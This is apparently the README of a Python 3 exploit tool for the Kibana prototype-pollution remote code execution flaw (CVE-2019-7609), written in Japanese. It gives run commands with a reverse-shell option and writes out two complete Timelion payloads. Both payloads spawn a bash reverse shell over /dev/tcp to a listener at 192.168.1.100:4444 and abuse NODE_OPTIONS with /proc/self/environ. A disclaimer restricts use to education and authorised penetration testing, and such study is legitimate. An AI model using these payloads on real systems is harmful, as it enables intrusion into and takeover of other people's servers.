
Kibana < 6.6.1 RCE (CVE-2019-7609) の Python 3 エクスプロイト。プロトタイプ汚染を介し、自動バージョン検出とオプションのリバースシェルを備えています。
作者: LandGrey (Python3リファクタリング: [Your Name])
参照: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ 免責事項:
このスクリプトは教育目的および許可された侵入テストのみを対象としています。所有していない、または明示的なテスト許可がないシステムで使用しないでください。作者および貢献者は、このツールの誤用や損害について一切責任を負いません。
これは、Kibanaバージョン < 6.6.1 の リモートコード実行脆弱性 に対するPython 3エクスプロイトスクリプトです。プロトタイプ汚染の欠陥を利用して、脆弱なKibanaインスタンス上で任意のコマンドを実行し、リバースシェルを起動することも可能です。
python3 kibana_exploit.py -u http://target-kibana:5601
リバースシェルを起動するには:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requests ライブラリpackaging ライブラリ依存関係のインストール:
pip install requests packaging
KibanaのTimelionビジュアライザーを使用して、この脆弱性を手動で悪用することもできます:
ペイロード作成者: securityMB
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
ペイロード作成者: chybeta
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
192.168.1.100 と 4444 を自分のリスナーのIPとポートに置き換えてください。
このスクリプトは、検出、確認、エクスプロイトの各段階で明確でステップバイステップの出力を提供し、追跡が容易で楽しく使用できます!
このスクリプトは、プロトタイプ汚染、リモートコード実行、侵入テスト技術を学ぶのに最適な方法です。責任を持って、常に許可を得て使用してください!
このプロジェクトは教育目的のみです。保証はありません。倫理的にハッキングし、好奇心を持ち続け、楽しんでください!